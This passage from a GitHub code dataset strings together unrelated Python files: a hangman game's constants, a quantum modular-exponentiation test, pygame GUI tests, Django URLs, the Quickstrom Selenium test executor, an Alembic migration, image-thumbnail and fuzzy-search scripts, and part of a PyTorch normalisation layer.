compare pvoigt and gaussian\n\n","repo_name":"Wellesley-Solar/training","sub_path":"other turotials/05_Introduction to Peak Fitting for XRD.py","file_name":"05_Introduction to Peak Fitting for XRD.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74991706933","text":"'''\n Assignment - Project 1: Hangman\n File: constants.py\n Description: This file contains all of the constants used in the game\n James Halladay\n Advanced Programming with Python\n Date: 8/29/2022\n\n\n *******************************************************************************\n\n *******************************************************************************\n'''\n\nfrom typing import (\n Any,\n Dict,\n List,\n Tuple,\n)\n\nfrom enum import Enum\n\n# database constants\n\nDB_NAME = \"hangman.db\"\n\nPLAYER_TABLE = \"Players\"\n\nclass ColumnNames():\n '''\n This class contains the column names for the player table\n '''\n NAME = 'Name'\n WINS = 'Wins'\n LOSSES = 'Losses'\n\n\nPLAYER_TABLE_COLUMNS = [\n 'Name', \n 'Wins', \n 'Losses'\n]\n\nPLAYER_TABLE_SCHEMA = [\n 'TEXT',\n 'INTEGER',\n 'INTEGER'\n]\n\n# file constants\n\nUTILITY_DIR = 'utils'\n\nWORD_FILE = 'words.json'\n\n# Model constants\n\nDEFAULT_PLAYER_NAME = 'player'\n\nDEFAULT_WINS = 0\n\nDEFAULT_LOSSES = 0\n\nDEFAULT_MAX_SCORE = 7\n\nDEFAULT_DIFFICULTY = 5\n\nResult = Tuple[bool, str]\n\n# word constants\n\nWORD_LENGTH = 'word_length'\n\n\n# graphql constants\n\nField = str\nMessage = str or bool\n\nclass ResponseField(Enum):\n '''\n This class contains the response field names\n '''\n \n data : Field = 'data'\n errors : Field = 'errors'\n success : Field = 'success'\n state : Field = 'state'\n time : Field = 'time'\n method : Field = 'method'\n input : Field = 'input'\n name : Field = 'name'\n wins : Field = 'wins'\n losses : Field = 'losses'\n missed : Field = 'missed'\n message : Field = 'message'\n word : Field = 'word'\n guessedWord: Field = 'guessedWord'\n\nResponse = Dict[ResponseField, Any]\n\n\nclass MenuItems(Enum):\n '''\n This class contains the menu item names\n '''\n\n PLAY_GAME = 'play'\n QUIT_GAME = 'quit'\n NEW_PLAYER = 'new'\n\n\nclass GameStates(Enum):\n '''\n This class contains the different \n '''\n\n PLAYING = 'playing'\n WIN = 'win'\n LOSE = 'lose'","repo_name":"jehalladay/AdvPy-jehalladay","sub_path":"project1/hangman/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15133337927","text":"from projectq.backends import CircuitDrawer\nimport projectq.libs.math\nimport projectq.setups.decompositions\nfrom projectq.backends import Simulator, ResourceCounter\nfrom projectq.cengines import (AutoReplacer, DecompositionRuleSet,\n InstructionFilter, LocalOptimizer,\n MainEngine, TagRemover)\n\nfrom projectq.ops import (All, Measure)\nfrom homemade_code.initialisation import meas2int, initialisation_n\nimport math\nfrom Projet_Partie2.expoModN import expoModN\n\ndef run(a=4, N=7, x=2, param=\"run\"):\n \"\"\"\n\n :param a: a --> |(a**x) mod N>\n \"\"\"\n # build compilation engine list\n resource_counter = ResourceCounter()\n rule_set = DecompositionRuleSet(modules=[projectq.libs.math,\n projectq.setups.decompositions])\n compilerengines = [AutoReplacer(rule_set),\n TagRemover(),\n LocalOptimizer(3),\n AutoReplacer(rule_set),\n TagRemover(),\n LocalOptimizer(3),\n resource_counter]\n\n # 
create a main compiler engine\n    a = a % N\n    b = 0\n    n = int(math.log(N, 2)) + 1\n\n    if param == \"latex\":\n        drawing_engine = CircuitDrawer()\n        eng = MainEngine(drawing_engine)\n    elif param == \"count\":\n        eng = MainEngine(resource_counter)\n    else:\n        eng = MainEngine(Simulator(), compilerengines)\n\n    output = initialisation_n(eng, 1, n + 1)\n    xN = initialisation_n(eng, N, n + 1)\n    xx = initialisation_n(eng, x, n + 1)\n    xb = initialisation_n(eng, b, n + 1)\n    aux = initialisation_n(eng, 0, 1)\n    expoModN(eng, a, output, xb, xN, aux, xx, N)\n\n    Measure | aux\n    All(Measure) | output\n    All(Measure) | xx\n    All(Measure) | xb\n    All(Measure) | xN\n    eng.flush()\n\n    if param == \"count\":\n        return resource_counter\n    if param == \"latex\":\n        print(drawing_engine.get_latex())\n\n    measurements_b = [0] * n\n    measurements_x = [0] * n\n    measurements_N = [0] * n\n    for k in range(n):\n        measurements_b[k] = int(xb[k])\n        measurements_N[k] = int(xN[k])\n        measurements_x[k] = int(output[k])\n\n    mes_aux = int(aux[0])\n\n    assert int(xb[n]) == 0\n    assert int(xN[n]) == 0\n    assert int(xx[n]) == 0\n    assert meas2int(measurements_b) == 0\n    assert meas2int(measurements_N) == N\n    assert mes_aux == 0\n\n    return [(a ** x) % N, meas2int(measurements_x), measurements_x]\n","repo_name":"miyamotohk/quantum-calculus","sub_path":"Probability distributions/expoModN_test.py","file_name":"expoModN_test.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"14779543572","text":"__author__ = 'Frostlock'\n\nimport unittest\nimport random\nimport pygame\n\nimport WarrensGame.Game as Game\nimport WarrensGame.CONSTANTS as CONSTANTS\nfrom WarrensGame.Actors import Player\nfrom WarrensGame.Levels import Level\nfrom WarrensGUI.MainWindow import MainWindow\n\nDELAY = 10\n\nclass TestGui(unittest.TestCase):\n\n    @classmethod\n    def setUpClass(self):\n        \"\"\"\n        unittest framework will run this once before all the tests in this class.\n        \"\"\"\n        CONSTANTS.SHOW_AI_LOGGING = False\n        CONSTANTS.SHOW_GAME_LOGGING = True\n        CONSTANTS.SHOW_GENERATION_LOGGING = False\n\n        self.game = Game.Game()\n        #Force quickstart (so we know where the portals are)\n        CONSTANTS.QUICKSTART = True\n        self.game.resetGame()\n        self.mainWindow = MainWindow()\n        self.mainWindow.game = self.game\n        \n    @classmethod\n    def tearDownClass(self):\n        \"\"\"\n        unittest framework will run this once after all the tests in this class have been run.\n        \"\"\"\n        pass\n        \n    def setUp(self):\n        \"\"\"\n        unittest framework will run this before every individual test.\n        \"\"\"\n        pass\n        \n    def tearDown(self):\n        \"\"\"\n        unittest framework will run this after every individual test.\n        \"\"\"\n        pass\n\n    @property\n    def player(self):\n        player = self.mainWindow.game.player\n        assert(isinstance(player, Player))\n        return player\n\n    @property\n    def level(self):\n        level = self.mainWindow.game.player.level\n        assert(isinstance(level, Level))\n        return level\n\n    def drawFrame(self):\n        self.mainWindow.refreshStaticObjects()\n        self.mainWindow.refreshDynamicObjects()\n        self.mainWindow.drawAll()\n        pygame.display.flip()\n        # Allow time to see it\n        pygame.time.delay(DELAY)\n\n    def test_showGUI(self):\n        # Draw first frame\n        self.drawFrame()\n\n    def test_moveAround(self):\n        for i in range(0,10):\n            dx = random.choice([-1, 0, 1])\n            dy = random.choice([-1, 0, 1])\n            self.player.tryMoveOrAttack(dx,dy)\n            self.drawFrame()\n\n    def test_followPortals(self):\n        for portal in self.level.portals:\n            self.player.moveToTile(portal.tile)\n            
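# follow the portal and draw a frame on its destination level\n            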
self.player.followPortal(portal)\n            self.drawFrame()\n\n    def test_grabItems(self):\n        dungeonLevel = self.mainWindow.game.levels[1]\n        for item in dungeonLevel.items:\n            self.player.moveToTile(item.tile)\n            self.player.tryPickUp()\n            self.drawFrame()\n","repo_name":"Frostlock/Warrens","sub_path":"WarrensTest/Gui_test.py","file_name":"Gui_test.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3875112265","text":"from django.contrib import admin\nfrom django.urls import path, include\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n]\n\n\nurlpatterns += [\n    path(\"\", include(\"quena.urls\", namespace=\"quena\")),\n    path(\"user/\", include(\"user.urls\", namespace=\"user\")),\n]","repo_name":"abhie-lp/Quena","sub_path":"clone/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70970572854","text":"import dataclasses\nimport io\nimport subprocess\nimport logging\nimport threading\nimport time\nfrom shutil import which\nfrom dataclasses import dataclass\nimport traceback\nimport png\nfrom typing import List, Union, Literal, Any, cast\nfrom selenium import webdriver\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.options import BaseOptions\nfrom selenium.webdriver.remote.webdriver import WebDriver\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support.select import Select\n\nfrom selenium.webdriver.chrome.options import Options as ChromeOptions\nfrom selenium.webdriver.chrome.service import Service as ChromeService\n\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\nfrom selenium.webdriver.firefox.service import Service as FirefoxService\n\nfrom selenium.webdriver.edge.options import Options as EdgeOptions\nfrom selenium.webdriver.edge.service import Service as EdgeService\n\nfrom selenium.webdriver.safari.options import Options as SafariOptions\nfrom selenium.webdriver.safari.service import Service as SafariService\n\nfrom quickstrom.protocol import *\nfrom quickstrom.hash import dict_hash\nimport quickstrom.result as result\nimport quickstrom.printer as printer\nimport os\n\nUrl = str\n\n\n@dataclass\nclass SpecstromError(Exception):\n    message: str\n    exit_code: int\n    log_file: str\n\n    def __str__(self):\n        return f\"{self.message}, exit code {self.exit_code}\"\n\n\n@dataclass\nclass SpecstromAbortedError(Exception):\n    message: str\n\n    def __str__(self):\n        return f\"{self.message}\"\n\n\n@dataclass\nclass PerformActionError(Exception):\n    action: Action\n    error: Exception\n\n    def __str__(self):\n        return f\"Error while performing {self.action}:\\n\\n{self.error}\"\n\n\n@dataclass\nclass UnsupportedActionError(Exception):\n    action: Action\n\n    def __str__(self):\n        return f\"Unsupported action: {self.action.id}\"\n\n\n@dataclass\nclass ScriptError(Exception):\n    name: str\n    script_args: List[JsonLike]\n    error: Exception\n\n    def __str__(self):\n        return f\"Error while invoking script {self.name} with args {self.script_args}:\\n{self.error}\"\n\n\n@dataclass\nclass ClientSideEvents:\n    events: List[Action]\n    state: State\n\n\n@dataclass\nclass Scripts:\n    query_state: Callable[[WebDriver, Dict[Selector, Schema]], State]\n    
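# installs listeners in the page so later await_events calls can pick up client-side changes\n    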
install_event_listener: Callable[[WebDriver, Dict[Selector, Schema]], None]\n await_events: Callable[\n [WebDriver, Dict[Selector, Schema], int], Optional[ClientSideEvents]\n ]\n\n\nBrowser = Union[\n Literal[\"chrome\"],\n Literal[\"firefox\"],\n Literal[\"edge\"],\n Literal[\"safari\"],\n]\n\n\n@dataclass\nclass Cookie:\n domain: str\n name: str\n value: str\n\n\n@dataclass\nclass Check:\n module: str\n origin: str\n browser: Browser\n browser_binary: Optional[str]\n include_paths: List[str]\n headless: bool\n capture_screenshots: bool\n cookies: List[Cookie]\n driver_log_file: Optional[str]\n extra_desired_capabilities: Optional[Dict[str, Any]]\n remote_webdriver_url: Optional[str]\n interpreter_log_file: IO\n log: logging.Logger = logging.getLogger(\"quickstrom.executor\")\n\n def execute(self) -> List[result.PlainResult]:\n scripts = self.load_scripts()\n\n with self.launch_specstrom(self.interpreter_log_file) as p:\n assert p.stdout is not None\n assert p.stdin is not None\n input_messages = message_reader(p.stdout)\n output_messages = message_writer(p.stdin)\n screenshots: Dict[str, result.Screenshot[bytes]] = {}\n\n def receive():\n msg = input_messages.read()\n exit_code = p.poll()\n if msg is None and exit_code is not None:\n if exit_code == 0:\n return None\n else:\n raise SpecstromError(\n \"Specstrom invocation failed\",\n exit_code,\n self.interpreter_log_file.name,\n )\n else:\n self.log.debug(\"Received %s\", msg)\n return msg\n\n def send(msg):\n exit_code = p.poll()\n if exit_code is None:\n self.log.debug(\"Sending %s\", msg)\n output_messages.write(msg)\n elif exit_code == 0:\n self.log.warning(\"Done, can't send.\")\n else:\n self.log.warning(\"Specstrom errored, can't send.\")\n\n def perform_action(driver, action):\n try:\n if action.id == \"noop\":\n pass\n elif action.id == \"click\":\n id = action.args[0]\n element = WebElement(driver, id)\n try:\n element.click()\n except Exception as e:\n self.log.warning(\n \"Basic click failed, falling back to JS click: %s\", e\n )\n driver.execute_script(\"arguments[0].click();\", element)\n elif action.id == \"doubleClick\":\n id = action.args[0]\n element = WebElement(driver, id)\n ActionChains(driver).move_to_element(element).double_click(\n element\n ).perform()\n elif action.id == \"select\":\n id = action.args[0]\n value = action.args[1]\n option = WebElement(driver, id)\n select = Select(\n option.find_element(By.XPATH, \"./ancestor::select\")\n )\n select.select_by_value(value)\n elif action.id == \"focus\":\n id = action.args[0]\n element = WebElement(driver, id)\n element.send_keys(\"\")\n elif action.id == \"keyPress\":\n char = action.args[0]\n element = driver.switch_to.active_element\n element.send_keys(char)\n elif action.id == \"enterText\":\n element = driver.switch_to.active_element\n element.send_keys(action.args[0])\n elif action.id == \"enterTextInto\":\n id = action.args[1]\n element = WebElement(driver, id)\n element.send_keys(action.args[0])\n elif action.id == \"clear\":\n id = action.args[0]\n element = WebElement(driver, id)\n element.clear()\n elif action.id == \"scrollBy\":\n driver.execute_script(\n \"window.scrollBy(arguments[0], arguments[1])\",\n action.args[0],\n action.args[1],\n )\n else:\n raise UnsupportedActionError(action)\n except Exception as e:\n raise PerformActionError(action, e)\n\n def screenshot(driver: WebDriver, hash: str):\n if self.capture_screenshots:\n bs: bytes = driver.get_screenshot_as_png() # type: ignore\n (width, height, _, _) = png.Reader(io.BytesIO(bs)).read()\n 
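# compare the PNG's pixel size with the CSS window size to infer the device pixel ratio\n                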
window_size = driver.get_window_size()\n scale = round(width / window_size[\"width\"])\n if scale != round(height / window_size[\"height\"]):\n self.log.warn(\n \"Width and height scales do not match for screenshot\"\n )\n screenshots[hash] = result.Screenshot(\n image=bs, width=width, height=height, scale=scale\n )\n\n def attach_screenshots(r: result.PlainResult) -> result.PlainResult:\n def on_state(state):\n return result.State(\n screenshot=screenshots.get(state.hash, None),\n queries=state.queries,\n hash=state.hash,\n )\n\n return result.map_states(r, on_state)\n\n def await_events(driver, deps, state_version, timeout: int):\n def on_no_events():\n state = scripts.query_state(driver, deps)\n screenshot(driver, dict_hash(state))\n state_version.increment()\n send(Timeout(state=state))\n\n try:\n self.log.debug(f\"Awaiting events with timeout {timeout}\")\n events = scripts.await_events(driver, deps, timeout)\n self.log.debug(f\"Change: {events}\")\n\n if events is None:\n self.log.info(f\"Timed out!\")\n on_no_events()\n else:\n screenshot(driver, dict_hash(events.state))\n state_version.increment()\n send(Events(events.events, events.state))\n except StaleElementReferenceException as e:\n self.log.error(f\"Stale element reference: {e}\")\n on_no_events()\n\n def run_sessions() -> List[result.PlainResult]:\n while True:\n msg = receive()\n assert msg is not None\n if isinstance(msg, Start):\n try:\n self.log.info(\"Starting session\")\n driver = self.new_driver()\n driver.set_script_timeout(10)\n driver.set_window_size(1200, 1200)\n\n if len(self.cookies) > 0:\n # First we need to visit the page in order to set cookies.\n driver.get(self.origin)\n for cookie in self.cookies:\n self.log.debug(f\"Setting {cookie}\")\n driver.add_cookie(dataclasses.asdict(cookie))\n # Now that cookies are set, we have to visit the origin again.\n driver.get(self.origin)\n # Hacky sleep to allow page load.\n time.sleep(1)\n\n state_version = Counter(initial_value=0)\n\n scripts.install_event_listener(driver, msg.dependencies)\n await_events(driver, msg.dependencies, state_version, 10000)\n\n await_session_commands(\n driver, msg.dependencies, state_version\n )\n except SpecstromAbortedError as e:\n raise e\n except Exception as e:\n send(Error(traceback.format_exc()))\n msg = receive()\n if not isinstance(msg, End):\n raise Exception(\n f\"Expected End after Error but got: {msg}\"\n )\n elif isinstance(msg, Done):\n return [\n attach_screenshots(result.from_protocol_result(r))\n for r in msg.results\n ]\n elif isinstance(msg, Aborted):\n raise SpecstromAbortedError(msg.error_message)\n else:\n raise Exception(f\"Unexpected message in run_sessions: {msg}\")\n\n def await_session_commands(driver: WebDriver, deps, state_version):\n try:\n while True:\n msg = receive()\n\n if not msg:\n raise Exception(\n \"No more messages from Specstrom, expected RequestAction or End.\"\n )\n elif isinstance(msg, RequestAction):\n if msg.version == state_version.value:\n self.log.info(\n f\"Performing action in state {state_version.value}: {printer.pretty_print_action(msg.action)}\"\n )\n\n perform_action(driver, msg.action)\n\n if msg.action.timeout is not None:\n self.log.debug(\"Installing change observer\")\n scripts.install_event_listener(driver, deps)\n\n state = scripts.query_state(driver, deps)\n screenshot(driver, dict_hash(state))\n state_version.increment()\n send(Performed(state=state))\n\n if msg.action.timeout is not None:\n await_events(\n driver, deps, state_version, msg.action.timeout\n )\n else:\n 
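# the action was computed against an outdated state; reply Stale so the interpreter can retry\n                            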
self.log.warn(\n f\"Got stale message ({msg}) in state {state_version.value}\"\n )\n send(Stale())\n elif isinstance(msg, AwaitEvents):\n if msg.version == state_version.value:\n self.log.info(\n f\"Awaiting events in state {state_version.value} with timeout {msg.await_timeout}\"\n )\n scripts.install_event_listener(driver, deps)\n await_events(\n driver, deps, state_version, msg.await_timeout\n )\n else:\n self.log.warn(\n f\"Got stale message ({msg}) in state {state_version.value}\"\n )\n send(Stale())\n elif isinstance(msg, End):\n self.log.info(\"Ending session\")\n return\n elif isinstance(msg, Aborted):\n raise SpecstromAbortedError(msg.error_message)\n else:\n raise Exception(f\"Unexpected message: {msg}\")\n finally:\n driver.close()\n\n return run_sessions()\n\n def launch_specstrom(self, ilog):\n includes = list(map(lambda i: \"-I\" + i, self.include_paths))\n cmd = [\"specstrom\", \"check\", self.module] + includes # + [\"+RTS\", \"-p\"]\n self.log.debug(\"Invoking Specstrom with: %s\", \" \".join(cmd))\n return subprocess.Popen(\n cmd,\n text=True,\n stdout=subprocess.PIPE,\n stderr=ilog,\n stdin=subprocess.PIPE,\n bufsize=0,\n )\n\n def new_driver(self) -> WebDriver:\n if self.remote_webdriver_url is not None:\n return webdriver.Remote(\n command_executor=self.remote_webdriver_url,\n options=self.browser_shared_options(),\n )\n elif self.browser == \"chrome\":\n chrome_opts = cast(ChromeOptions, self.browser_shared_options())\n chromedriver_path = which(\"chromedriver\")\n if not chromedriver_path:\n raise Exception(\"chromedriver not found in PATH\")\n browser_path = (\n self.browser_binary\n or which(\"chromium\")\n or which(\"google-chrome-stable\")\n or which(\"google-chrome\")\n or which(\"chrome\")\n )\n chrome_opts.binary_location = browser_path # type: ignore\n chrome_opts.add_argument(\"--no-sandbox\")\n chrome_opts.add_argument(\"--single-process\")\n return webdriver.Chrome(\n options=chrome_opts,\n service=ChromeService(\n executable_path=chromedriver_path, log_path=self.driver_log_file\n ),\n )\n elif self.browser == \"edge\":\n edge_opts = cast(EdgeOptions, self.browser_shared_options())\n edgedriver_path = which(\"msedgedriver\")\n if not edgedriver_path:\n raise Exception(\"msedgedriver not found in PATH\")\n browser_path = (\n self.browser_binary\n or which(\"microsoft-edge-stable\")\n or which(\"microsoft-edge\")\n )\n edge_opts.binary_location = browser_path # type: ignore\n edge_opts.add_argument(\"--no-sandbox\")\n edge_opts.add_argument(\"--single-process\")\n return webdriver.Edge(\n options=edge_opts,\n service=EdgeService(\n executable_path=edgedriver_path, log_path=self.driver_log_file\n ),\n )\n elif self.browser == \"firefox\":\n firefox_opts = cast(FirefoxOptions, self.browser_shared_options())\n binary = self.browser_binary or which(\"firefox\")\n geckodriver_path = which(\"geckodriver\")\n if not geckodriver_path:\n raise Exception(\"geckodriver not found in PATH\")\n return webdriver.Firefox(\n options=firefox_opts,\n service=FirefoxService(\n executable_path=geckodriver_path,\n log_path=self.driver_log_file or \"geckodriver.log\",\n service_args=[\"--binary\", binary] if binary else [],\n ),\n )\n else:\n raise Exception(f\"Unsupported browser: {self.browser}\")\n\n def browser_shared_options(self) -> Union[ChromeOptions, FirefoxOptions, EdgeOptions, SafariOptions]:\n def set_shared(options):\n for key, value in (self.extra_desired_capabilities or {}).items():\n options.set_capability(key, value)\n options.headless = self.headless\n return 
options\n\n if self.browser == \"chrome\":\n return set_shared(ChromeOptions())\n elif self.browser == \"firefox\":\n return set_shared(FirefoxOptions())\n elif self.browser == \"edge\":\n return set_shared(EdgeOptions())\n elif self.browser == \"safari\":\n return set_shared(SafariOptions())\n else:\n raise Exception(f\"Unsupported browser: {self.browser}\")\n\n def load_scripts(self) -> Scripts:\n def map_query_state(r):\n if r is None:\n raise Exception(\n \"WebDriver script invocation failed with unexpected None result. This might be caused by an unexpected page navigation in the browser. Consider adding a timeout to the corresponding action.\"\n )\n return elements_to_refs(r)\n\n def map_client_side_events(r):\n def map_event(e: dict):\n if e[\"tag\"] == \"loaded\":\n return Action(id=\"loaded\", args=[], isEvent=True, timeout=None)\n elif e[\"tag\"] == \"changed\":\n return Action(\n id=\"changed\",\n args=[elements_to_refs(e[\"element\"])],\n isEvent=True,\n timeout=None,\n )\n elif e[\"tag\"] == \"detached\":\n return Action(\n id=\"detached\", args=[e[\"markup\"]], isEvent=True, timeout=None\n )\n else:\n raise Exception(f\"Invalid event tag in: {e}\")\n\n return (\n ClientSideEvents(\n [map_event(e) for e in r[\"events\"]], elements_to_refs(r[\"state\"])\n )\n if r is not None\n else None\n )\n\n result_mappers = {\n \"queryState\": map_query_state,\n \"installEventListener\": lambda r: r,\n \"awaitEvents\": map_client_side_events,\n }\n\n def load_script(name: str, is_async: bool = False) -> Any:\n key = \"QUICKSTROM_CLIENT_SIDE_DIRECTORY\"\n client_side_dir = os.getenv(key)\n if not client_side_dir:\n raise Exception(f\"Environment variable {key} must be set\")\n file = open(f\"{client_side_dir}/{name}.js\")\n script = file.read()\n\n def f(driver: WebDriver, *args: Any) -> JsonLike:\n try:\n r = (\n driver.execute_async_script(script, *args)\n if is_async\n else driver.execute_script(script, *args)\n )\n return result_mappers[name](r)\n except StaleElementReferenceException as e:\n raise e\n except Exception as e:\n raise ScriptError(name, list(args), e)\n\n return f\n\n return Scripts(\n query_state=load_script(\"queryState\"),\n install_event_listener=load_script(\"installEventListener\"),\n await_events=load_script(\"awaitEvents\", is_async=True),\n )\n\n\ndef elements_to_refs(obj: Any) -> Any:\n if isinstance(obj, dict):\n return {key: elements_to_refs(value) for (key, value) in obj.items()}\n elif isinstance(obj, list):\n return [elements_to_refs(value) for value in obj]\n elif isinstance(obj, WebElement):\n return obj.id\n else:\n return obj\n\n\nclass Counter(object):\n def __init__(self, initial_value=0):\n self.value = initial_value\n self._lock = threading.Lock()\n\n def increment(self):\n with self._lock:\n self.value += 1\n","repo_name":"quickstrom/quickstrom","sub_path":"quickstrom/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":22568,"program_lang":"python","lang":"en","doc_type":"code","stars":341,"dataset":"github-code","pt":"21"} +{"seq_id":"40127408187","text":"\"\"\"empty message\n\nRevision ID: 00fd95caf146\nRevises: ff6127b7e211\nCreate Date: 2022-01-18 19:14:26.603332\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '00fd95caf146'\ndown_revision = 'ff6127b7e211'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.alter_column('contributed_asset', 'uuid',\n existing_type=sa.INTEGER(),\n type_=sa.String(),\n existing_nullable=False)\n op.alter_column('track_asset', 'uuid',\n existing_type=sa.INTEGER(),\n type_=sa.String(),\n existing_nullable=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('track_asset', 'uuid',\n existing_type=sa.String(),\n type_=sa.INTEGER(),\n existing_nullable=False)\n op.alter_column('contributed_asset', 'uuid',\n existing_type=sa.String(),\n type_=sa.INTEGER(),\n existing_nullable=False)\n # ### end Alembic commands ###\n","repo_name":"royalsaltmerchant/salt_server","sub_path":"migrations/versions/00fd95caf146_.py","file_name":"00fd95caf146_.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18386795992","text":"from PIL import Image\r\nimport os\r\n\r\n#map_image = Image.open(\"Master_Map.jpg\")\r\n#Image._show(map_image)\r\n#map_image.show()\r\n#map_image.save(\"Master_Map.bmp\")\r\nsize_300 = (300,300)\r\nsize_800 = (800,800)\r\n\r\nfor file in os.listdir('.'):\r\n if file.endswith('.bmp'):\r\n img = Image.open(file)\r\n fn,fext = os.path.splitext(file)\r\n\r\n img.thumbnail(size_800)\r\n img.convert(mode='L').save(\"800\\{}_800.jpg\".format(fn))\r\n #img.save(\"800\\{}_800.jpg\".format(fn))\r\n print(\"{}_800.jpg\".format(fn))\r\n\r\n img.thumbnail(size_300)\r\n img.save(\"300\\{}_300.jpg\".format(fn))\r\n print(\"{}_300.jpg\".format(fn))\r\n\r\n## just is for test from Home server1\r\n## test 2\r\n\r\n\r\n\r\n#print(os.chdir(\".\"))","repo_name":"yousef-niari/watom","sub_path":"test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30619490384","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[10]:\n\n\nimport numpy as np\nimport pandas as pd\nimport Levenshtein as lp\nimport math\nimport sys\n\n\n# In[11]:\n\n\ndf = pd.read_excel('mmv.xlsx')\n\n\n# In[12]:\n\n\nr = []\nind = 0\nfor i in df['model_name']:\n j = i.split(' ')\n r.append(j[len(j)-1])\n\n\n# In[13]:\n\n\ndf['r']=r\n\n\n# In[6]:\n\n\n# merging\ndf1 = []\ndf2 = []\nfor j in range(2):\n for i in df['model_name']:\n df2.append(str(i))\nfor i in df['make_name']:\n df1.append(str(i))\nfor i in df['r']:\n df1.append(str(i))\ndf1 = {'make_name' : df1, 'model_name' : df2}\ndf1 = pd.DataFrame(df1)\n\n\n# In[8]:\n\n\ndf2 = {}\nmake = df1['make_name']\nfor i in make:\n make1 = []\n x = str(i)\n for j in range(3,len(x)):\n if(x[j - 1] == ' '):\n continue\n make1.append(x[0:j])\n make1.append(x)\n df2[x] = make1\n# print(x, ':', df2[x])\nmodel1 = []\nmake_sub1 = []\nct = 0\nfor i in range(len(df1['make_name'])):\n make = df1['make_name'].iloc[i]\n model = df1['model_name'].iloc[i]\n for make_sub in df2[make]:\n model1.append(model)\n make_sub1.append(make_sub)\ndf3 = {'make_name' : make_sub1, 'model_name' : model1}\ndf3 = pd.DataFrame(df3)\ndf3=df3.apply(lambda x: x.astype(str).str.lower())\n\n\n# In[ ]:\n\n\n#Taking the input value and comparing edit distance with every value in the dataset\ninp = input()\ned = {}\nfor names in df3['make_name']:\n if names in ed:\n continue\n else:\n ed[names] = lp.distance(str(names), inp)\n\n\n# In[ ]:\n\n\nmi = sys.maxsize\nmi_name = ''\nfor i in ed:\n if ed[i] < mi:\n mi = ed[i]\n mi_name = str(i)\nmi, mi_name\n\n\n# In[ ]:\n\n\nedi = 
[]\nfor make in df3['make_name']:\n edi.append(ed[make])\ndf3['make_ed'] = edi\n\nc = mi\nli = []\nfor k in range(len(df3['model_name'])):\n if df3['make_ed'].iloc[k] == c:\n li.append(df3['model_name'].iloc[k])\n# converting into set to get rid of same values in our dataset\nli = set(li)\n# coverting back into list as further operations can be implemented only on list\nli_list = list(li)\nli_list\n\n\n# In[ ]:\n\n\n# check the first letter match\nfor i in range (len(li)):\n if li_list[i][0] == inp[0]:\n print (li_list[i])\n\n\n# In[ ]:\n\n\n# for i in range(len(li_list)):\n# te = li_list[i].split()\n# for j in range(len(te)):\n# if te[j] == inp:\n# print (li[i])\n# elif te[j][0] == inp[0]:\n# print (li_list[i])\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Himanshu-Him/Search-Bar-Optimization","sub_path":"Search_algo.py","file_name":"Search_algo.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13588048502","text":"import torch\nfrom typing import OrderedDict\nfrom ..activations import activation_factory\nfrom ..layers.regularization import LayerNormChannelsFirst\n\n\ndef get_adn_fn(\n spatial_dim, norm_fn=\"batch\", act_fn=\"swish\", dropout_param=0.1\n):\n norm_fn_dict = {\n \"batch\": {\n 1: torch.nn.BatchNorm1d,\n 2: torch.nn.BatchNorm2d,\n 3: torch.nn.BatchNorm3d,\n },\n \"instance\": {\n 1: torch.nn.InstanceNorm1d,\n 2: torch.nn.InstanceNorm2d,\n 3: torch.nn.InstanceNorm3d,\n },\n \"layer\": {\n 1: torch.nn.LayerNorm,\n 2: LayerNormChannelsFirst,\n 3: LayerNormChannelsFirst,\n },\n \"identity\": {\n 1: torch.nn.Identity,\n 2: torch.nn.Identity,\n 3: torch.nn.Identity,\n },\n }\n if norm_fn not in norm_fn_dict:\n raise \"norm_fn must be one of {}\".format(norm_fn_dict)\n norm_fn = norm_fn_dict[norm_fn][spatial_dim]\n if isinstance(act_fn, str):\n act_fn = activation_factory[act_fn]\n\n return ActDropNormBuilder(\n norm_fn=norm_fn, act_fn=act_fn, dropout_param=dropout_param\n )\n\n\nclass ActDropNorm(torch.nn.Module):\n def __init__(\n self,\n in_channels: int = None,\n ordering: str = \"NDA\",\n norm_fn: torch.nn.Module = torch.nn.BatchNorm2d,\n act_fn: torch.nn.Module = torch.nn.PReLU,\n dropout_fn: torch.nn.Module = torch.nn.Dropout,\n dropout_param: float = 0.0,\n inplace: bool = False,\n ):\n \"\"\"Convenience function to combine activation, dropout and\n normalisation. Similar to ADN in MONAI.\n\n Args:\n in_channels (int, optional): number of input channels. Defaults to\n None.\n ordering (str, optional): ordering of the 